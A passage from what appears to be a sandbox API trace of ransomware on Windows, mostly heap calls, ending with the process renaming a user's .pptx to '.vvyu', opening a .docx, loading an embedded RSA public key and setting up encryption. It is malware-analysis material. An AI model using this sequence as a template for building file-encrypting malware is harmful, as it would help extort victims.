Flags=0x0, Size=0x9) returned 0x2a0da30 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0188.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.956] GetCurrentThreadId () returned 0x5d8 [0188.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae3eb8 [0188.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.957] GetCurrentThreadId () returned 0x5d8 [0188.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0188.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0188.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da48 [0188.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0188.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daa8 [0188.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0188.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0188.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dac0 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da60 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da30 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af2b90 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2da0 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af2fb8 [0188.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2da0 | out: hHeap=0x2c0000) returned 1 [0188.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2fb8 | out: hHeap=0x2c0000) returned 1 [0188.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0188.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0188.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae29b0 | out: hHeap=0x2c0000) returned 1 [0188.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2b90 | out: hHeap=0x2c0000) returned 1 [0188.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0188.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0188.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.968] WriteFile (in: hFile=0x584, lpBuffer=0x2af1f88*, nNumberOfBytesToWrite=0xbfd, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af1f88*, lpNumberOfBytesWritten=0x2f9fb14*=0xbfd, lpOverlapped=0x0) returned 1 [0188.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.969] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc02, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.969] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.970] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.971] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.971] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.971] CloseHandle (hObject=0x584) returned 1 [0188.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0188.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af1f88 [0188.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0188.973] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\92-ieu- ecANbCAHxu3.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\92-ieu- ecanbcahxu3.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\92-ieu- ecANbCAHxu3.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\92-ieu- ecanbcahxu3.pptx.vvyu")) returned 1 [0188.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.974] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0188.978] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc39e8cd0, ftCreationTime.dwHighDateTime=0x1d8894b, ftLastAccessTime.dwLowDateTime=0xb678cb30, ftLastAccessTime.dwHighDateTime=0x1d88b6f, ftLastWriteTime.dwLowDateTime=0xb678cb30, ftLastWriteTime.dwHighDateTime=0x1d88b6f, nFileSizeHigh=0x0, nFileSizeLow=0xc775, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a_eeMub.docx", cAlternateFileName="A_EEMU~1.DOC")) returned 1 [0188.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae29b0 [0188.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae29b0 | out: hHeap=0x2c0000) returned 1 [0188.979] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\a_eeMub.docx") returned=".docx" [0188.979] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\a_eeMub.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\a_eemub.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.979] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=51061) returned 1 [0188.979] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.982] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc74f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.982] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.999] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.000] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xc775, lpOverlapped=0x0) returned 1 [0189.001] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.001] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.001] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.001] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.002] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.002] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.002] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.002] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.002] GetLastError () returned 0x0 [0189.002] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.002] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.003] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.003] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.003] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc780) returned 0x2af5168 [0189.003] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, 